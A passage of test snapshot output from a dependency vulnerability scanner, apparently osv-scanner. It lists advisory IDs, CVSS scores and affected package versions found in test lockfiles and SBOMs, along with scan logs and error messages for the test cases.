https://osv.dev/DEBIAN-CVE-2023-2975 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3446 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3817 | | | | | | | | https://osv.dev/DLA-3530-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-5678 | 9.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0727 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-2511 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4741 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-5535 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-9143 | | | | | | | | https://osv.dev/DLA-3942-1 | | | | | | | | https://osv.dev/DLA-3942-2 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-6129 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-6237 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-12797 | 6.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-13176 | 4.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4176-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4603 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-11187 | 6.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15468 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15469 | 5.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-4575 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-66199 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9231 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2673 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5902-1 | 8.4 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12837 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12883 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-12015 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18311 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18312 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18313 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18314 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6797 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6798 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2018-6913 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10543 | 8.2 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10878 | 8.6 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-12723 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-16156 | 8.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-31484 | | | | | | | | https://osv.dev/DLA-3926-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2021-36770 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-47038 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-40909 | 5.9 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5135-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3072-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3189-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3316-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3422-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3600-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DLA-3651-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3764-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-17512 | 8.8 | Debian | sensible-utils | 0.0.9+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-20482 | 4.7 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-39804 | 6.2 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3755-1 | | | | | | | | https://osv.dev/DLA-3051-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3134-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3161-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3366-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3412-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3684-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3788-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3972-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4085-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4105-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4403-1 | | Debian | 
tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4016-1 | | Debian | ucf | 3.0036 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5055-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5650-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2779 | 7.8 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-3184 | | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5123-1 | 8.8 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5895-1 | 8.7 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-3094 | 10.0 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ --- [TestCommand_LocalDatabases/one_specific_supported_sbom_with_vulns - 4] --- [TestCommand_LocalDatabases/one_specific_unsupported_lockfile - 1] Scanning dir ./testdata/locks-many/not-a-lockfile.toml --- [TestCommand_LocalDatabases/one_specific_unsupported_lockfile - 2] No package sources found, --help for usage information. --- [TestCommand_LocalDatabases/one_specific_unsupported_lockfile - 3] Scanning dir ./testdata/locks-many/not-a-lockfile.toml --- [TestCommand_LocalDatabases/one_specific_unsupported_lockfile - 4] No package sources found, --help for usage information. 
--- [TestCommand_LocalDatabases/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) - 2] --- [TestCommand_LocalDatabases/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) - 3] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) - 4] --- [TestCommand_LocalDatabases/output_format:_markdown_table - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Loaded Packagist local db from /osv-scanner/Packagist/all.zip No issues found --- [TestCommand_LocalDatabases/output_format:_markdown_table - 2] --- [TestCommand_LocalDatabases/output_format:_markdown_table - 3] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Loaded Packagist local db from /osv-scanner/Packagist/all.zip No issues found --- [TestCommand_LocalDatabases/output_format:_markdown_table - 4] --- [TestCommand_LocalDatabases/output_with_json - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_LocalDatabases/output_with_json - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Loaded filter from: 
/testdata/locks-many/osv-scanner-test.toml Loaded Packagist local db from /osv-scanner/Packagist/all.zip --- [TestCommand_LocalDatabases/output_with_json - 3] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_LocalDatabases/output_with_json - 4] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Loaded Packagist local db from /osv-scanner/Packagist/all.zip --- [TestCommand_LocalDatabases_AlwaysOffline/a_bunch_of_different_lockfiles_and_ecosystem - 1] Scanning dir ./testdata/locks-requirements Scanning dir ./testdata/locks-many-with-insecure Scanned /testdata/locks-many-with-insecure/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/locks-many-with-insecure/composer.lock file and found 6 packages Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Scanned /testdata/locks-many-with-insecure/yarn.lock file and found 1 package Scanned /testdata/locks-requirements/my-requirements.txt file and found 1 package Scanned /testdata/locks-requirements/requirements-dev.txt file and found 1 package Scanned /testdata/locks-requirements/requirements-transitive.txt file and found 4 packages Scanned /testdata/locks-requirements/requirements.prod.txt file and found 1 package Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Scanned /testdata/locks-requirements/the_requirements_for_test.txt file and found 1 package Scanned /testdata/locks-requirements/unresolvable-requirements.txt file and found 3 packages Filtered 1 local/unscannable package/s from the scan. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. 
--- [TestCommand_LocalDatabases_AlwaysOffline/a_bunch_of_different_lockfiles_and_ecosystem - 2] could not load db for RubyGems ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for Alpine ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for Packagist ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for npm ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for PyPI ecosystem: unable to fetch OSV database: no offline version of the OSV database is available --- [TestCommand_LocalDatabases_AlwaysOffline/a_bunch_of_different_lockfiles_and_ecosystem - 3] Scanning dir ./testdata/locks-requirements Scanning dir ./testdata/locks-many-with-insecure Scanned /testdata/locks-many-with-insecure/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/locks-many-with-insecure/composer.lock file and found 6 packages Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Scanned /testdata/locks-many-with-insecure/yarn.lock file and found 1 package Scanned /testdata/locks-requirements/my-requirements.txt file and found 1 package Scanned /testdata/locks-requirements/requirements-dev.txt file and found 1 package Scanned /testdata/locks-requirements/requirements-transitive.txt file and found 4 packages Scanned /testdata/locks-requirements/requirements.prod.txt file and found 1 package Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Scanned /testdata/locks-requirements/the_requirements_for_test.txt file and found 1 package Scanned /testdata/locks-requirements/unresolvable-requirements.txt file and found 3 packages Filtered 1 local/unscannable package/s from the scan. 
Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestCommand_LocalDatabases_AlwaysOffline/a_bunch_of_different_lockfiles_and_ecosystem - 4] could not load db for RubyGems ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for Alpine ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for Packagist ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for npm ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for PyPI ecosystem: unable to fetch OSV database: no offline version of the OSV database is available --- [TestCommand_LockfileWithExplicitParseAs/"apk-installed"_is_supported - 1] Scanned /testdata/locks-many/installed file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_LockfileWithExplicitParseAs/"apk-installed"_is_supported - 2] --- [TestCommand_LockfileWithExplicitParseAs/"dpkg-status"_is_supported - 1] Scanned /testdata/locks-many/status file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_LockfileWithExplicitParseAs/"dpkg-status"_is_supported - 2] --- [TestCommand_LockfileWithExplicitParseAs/absolute_paths_are_automatically_escaped_on_windows - 1] Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_LockfileWithExplicitParseAs/absolute_paths_are_automatically_escaped_on_windows - 2] --- [TestCommand_LockfileWithExplicitParseAs/absolute_paths_can_have_explicit_parse_as - 1] --- [TestCommand_LockfileWithExplicitParseAs/absolute_paths_can_have_explicit_parse_as - 2] Error during extraction: (extracting as javascript/packagelockjson) /testdata/locks-many/yarn.lock: could not extract: invalid character '#' looking for beginning of value extraction failed on specified lockfile --- [TestCommand_LockfileWithExplicitParseAs/absolute_paths_work_with_explicit_escaping - 1] Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_LockfileWithExplicitParseAs/absolute_paths_work_with_explicit_escaping - 2] --- [TestCommand_LockfileWithExplicitParseAs/empty_is_default - 1] Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_LockfileWithExplicitParseAs/empty_is_default - 2] --- [TestCommand_LockfileWithExplicitParseAs/empty_works_as_an_escape_(no_fixture_because_it's_not_valid_on_Windows) - 1] --- [TestCommand_LockfileWithExplicitParseAs/empty_works_as_an_escape_(no_fixture_because_it's_not_valid_on_Windows) - 2] failed to resolve path: stat /path/to/my:file: no such file or directory --- [TestCommand_LockfileWithExplicitParseAs/empty_works_as_an_escape_(no_fixture_because_it's_not_valid_on_Windows)#01 - 1] --- [TestCommand_LockfileWithExplicitParseAs/empty_works_as_an_escape_(no_fixture_because_it's_not_valid_on_Windows)#01 - 2] failed to resolve path: stat /path/to/my:project/package-lock.json: no such file or directory --- [TestCommand_LockfileWithExplicitParseAs/files_that_error_on_parsing_stop_parsable_files_from_being_checked - 1] Scanning dir ./testdata/locks-insecure Scanning dir ./testdata/locks-many --- [TestCommand_LockfileWithExplicitParseAs/files_that_error_on_parsing_stop_parsable_files_from_being_checked - 2] Error during extraction: (extracting as rust/cargolock) /testdata/locks-insecure/my-package-lock.json: could not extract: toml: line 1: expected '.' or '=', but got '{' instead extraction failed on specified lockfile --- [TestCommand_LockfileWithExplicitParseAs/multiple,_+_output_order_is_deterministic - 1] Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/my-package-lock.json file and found 1 package Scanned /testdata/locks-insecure/my-yarn.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Total 3 packages affected by 3 known vulnerabilities (1 Critical, 2 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 3 vulnerabilities can be fixed. +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-insecure/composer.lock | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-insecure/my-package-lock.json | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-insecure/my-yarn.lock | +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ --- [TestCommand_LockfileWithExplicitParseAs/multiple,_+_output_order_is_deterministic - 2] --- [TestCommand_LockfileWithExplicitParseAs/multiple,_+_output_order_is_deterministic_2 - 1] Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/my-package-lock.json file and found 1 package Scanned /testdata/locks-insecure/my-yarn.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 3 packages affected by 3 known vulnerabilities (1 Critical, 2 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 3 vulnerabilities can be fixed. 
+-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-insecure/composer.lock | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-insecure/my-package-lock.json | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-insecure/my-yarn.lock | +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ --- [TestCommand_LockfileWithExplicitParseAs/multiple,_+_output_order_is_deterministic_2 - 2] --- [TestCommand_LockfileWithExplicitParseAs/one_lockfile_with_local_path - 1] Scanned /testdata/locks-many/replace-local.mod file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. 
No issues found --- [TestCommand_LockfileWithExplicitParseAs/one_lockfile_with_local_path - 2] --- [TestCommand_LockfileWithExplicitParseAs/parse-as_takes_priority,_even_if_it's_wrong - 1] --- [TestCommand_LockfileWithExplicitParseAs/parse-as_takes_priority,_even_if_it's_wrong - 2] Error during extraction: (extracting as javascript/packagelockjson) /testdata/locks-many/yarn.lock: could not extract: invalid character '#' looking for beginning of value extraction failed on specified lockfile --- [TestCommand_LockfileWithExplicitParseAs/unsupported_parse-as - 1] --- [TestCommand_LockfileWithExplicitParseAs/unsupported_parse-as - 2] could not determine extractor, requested my-file --- [TestCommand_LockfileWithExplicitParseAs/when_an_explicit_parse-as_is_given,_it's_applied_to_that_file - 1] Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/my-package-lock.json file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 2 packages affected by 2 known vulnerabilities (1 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 2 vulnerabilities can be fixed. 
+-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-insecure/composer.lock | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-insecure/my-package-lock.json | +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ --- [TestCommand_LockfileWithExplicitParseAs/when_an_explicit_parse-as_is_given,_it's_applied_to_that_file - 2] --- [TestCommand_MoreLockfiles/Package.resolved_-_Unsupported_ecosystem,_should_not_be_scanned - 1] Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_MoreLockfiles/Package.resolved_-_Unsupported_ecosystem,_should_not_be_scanned - 2] could not determine extractor suitable to this file: "/testdata/locks-scalibr/Package.resolved" --- [TestCommand_MoreLockfiles/Podfile.lock_-_Unsupported_ecosystem,_should_not_be_scanned - 1] Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
--- [TestCommand_MoreLockfiles/Podfile.lock_-_Unsupported_ecosystem,_should_not_be_scanned - 2] could not determine extractor suitable to this file: "/testdata/locks-scalibr/Podfile.lock" --- [TestCommand_MoreLockfiles/cabal.project.freeze - 1] Scanned /testdata/locks-scalibr/cabal.project.freeze file and found 6 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. +--------------------------------+------+-----------+-----------------+---------+---------------+---------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------------+------+-----------+-----------------+---------+---------------+---------------------------------------------+ | https://osv.dev/HSEC-2024-0009 | | Hackage | biscuit-haskell | 0.3.0.0 | 0.4.0.0 | testdata/locks-scalibr/cabal.project.freeze | +--------------------------------+------+-----------+-----------------+---------+---------------+---------------------------------------------+ --- [TestCommand_MoreLockfiles/cabal.project.freeze - 2] --- [TestCommand_MoreLockfiles/depsjson - 1] Scanned /testdata/locks-scalibr/depsjson file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. 
+-------------------------------------+------+-----------+--------------------------+---------+---------------+---------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+--------------------------+---------+---------------+---------------------------------+ | https://osv.dev/GHSA-4cv2-4hjh-77rx | | NuGet | System.Linq.Dynamic.Core | 1.3.7 | 1.6.0 | testdata/locks-scalibr/depsjson | +-------------------------------------+------+-----------+--------------------------+---------+---------------+---------------------------------+ --- [TestCommand_MoreLockfiles/depsjson - 2] --- [TestCommand_MoreLockfiles/gems.locked - 1] Scanned /testdata/locks-scalibr/gems.locked file and found 26 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 2 packages affected by 6 known vulnerabilities (0 Critical, 2 High, 1 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 6 vulnerabilities can be fixed. 
